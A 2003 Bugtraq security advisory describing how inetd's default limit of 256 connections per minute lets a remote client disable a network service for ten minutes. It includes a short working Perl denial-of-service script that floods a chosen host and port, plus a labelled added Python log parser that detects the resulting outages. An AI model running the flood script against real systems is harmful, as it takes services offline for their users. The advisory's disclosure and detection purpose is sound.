Date: Sat, 6 Sep 2003 18:08:22 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: bugtraq@...urityfocus.com
Subject: 11 years of inetd default insecurity?


Dear bugtraq@...urityfocus.com,

Well, we all blame Microsoft for insecure default configuration... Isn't
it time to clean up outdated code in Unix?

I. Intro

Saint_Byte reported a DoS vulnerability in wu-ftp. A small perl script (like
the one below) kills the ftp service... On closer look, it is the good old
inetd feature, and a lot of existing FreeBSD/linux installations are still
vulnerable. This problem has been known since ancient times [1] and was
discussed again and again, but is still present. In fact, the problem is well
known. It's just another rake everyone steps on. It's in every man page and
FAQ, but maybe it's time to resolve it? Because it's definitely a BUG.

II. Who is vulnerable

Any system shipped with network daemons launched through inetd (FreeBSD,
SuSE, Red Hat, etc.).

III. Details

Inetd has an option

     -R rate
             Specify the maximum number of times a service can be invoked in 
             one minute; the default is 256.  A rate of 0 allows an unlimited
             number of invocations.

The problem is, a remote attacker can establish as many connections per
minute as bandwidth allows... Now, guess how inetd reacts if more than
256 connections are received in one minute? It will disable the service for
the next 10 minutes, to help the attack succeed. Of course, this is documented.
The interval is not configurable.

Something like

Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated

will appear in the logs... If the connection is closed by the attacker before
the service actually starts, the IP address of the attacker will never be logged.
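As an added example (not part of the original post), a small Python log check that picks the "server failing (looping)" message out of syslog lines, assuming the line format quoted above and the 10-minute disable interval the post describes, and reports when each service was cut off, when inetd will try it again, and how often each service tripped. The sample log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# The message inetd logs when a service exceeds its -R rate limit (format as quoted above).
INETD_LOOPING_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) "
    r"inetd\[\d+\]: (?P<service>[^/\s]+)/(?P<proto>tcp|udp) "
    r"server failing \(looping\), service terminated$"
)

# inetd keeps the service disabled for 10 minutes after this message (not configurable).
DISABLE_INTERVAL = timedelta(minutes=10)


def parse_inetd_looping(lines, year):
    """Return one dict per rate-limit trip; syslog lines carry no year, so the caller supplies it."""
    events = []
    for line in lines:
        m = INETD_LOOPING_RE.match(line.rstrip("\n"))
        if not m:
            continue
        stamp = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append({"host": m["host"], "service": f"{m['service']}/{m['proto']}",
                       "terminated_at": stamp, "restart_at": stamp + DISABLE_INTERVAL})
    return events


def outage_summary(events):
    """Count trips per (host, service); repeated trips point to a sustained connection flood."""
    counts = {}
    for ev in events:
        key = (ev["host"], ev["service"])
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed sample syslog: two ftp/tcp trips on one host, an unrelated line, one telnet trip.
SAMPLE_LOG = [
    "Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated",
    "Jul 23 15:27:11 host sshd[412]: Accepted publickey for admin from 192.0.2.10 port 51022",
    "Jul 23 15:38:02 host inetd[86]: ftp/tcp server failing (looping), service terminated",
    "Jul 23 16:01:45 host2 inetd[77]: telnet/tcp server failing (looping), service terminated",
]

if __name__ == "__main__":
    for ev in parse_inetd_looping(SAMPLE_LOG, year=2003):
        print(f"{ev['host']} {ev['service']}: cut off {ev['terminated_at']}, "
              f"inetd retries after {ev['restart_at']}")
    print(outage_summary(parse_inetd_looping(SAMPLE_LOG, year=2003)))
```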

IV. Workaround

-R 0 -s your_ad_can_be_here

or ask everyone not to bother your server.

V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl
# Opens and immediately closes 300 TCP connections to HOST:PORT,
# i.e. more than inetd's default -R limit of 256 per minute.

use strict;
use warnings;
use Socket;

my $host = $ARGV[0];
my $port = $ARGV[1];
if (!defined $host || !defined $port || $host eq "" || $port eq "") {
    print "\n Usage progname HOST PORT \n";
    exit 1;
}
my $iadr = inet_aton($host) or die "cannot resolve $host\n";
my $padr = sockaddr_in($port, $iadr);
for (my $i = 0; $i < 300; $i++) {
    socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket: $!\n";
    connect(SOCK, $padr) or next;   # refused connections are simply skipped
    close(SOCK);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

VI. References:

[1] Ari Luotonen, "www/tcp server failing (looping), service terminated"
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)


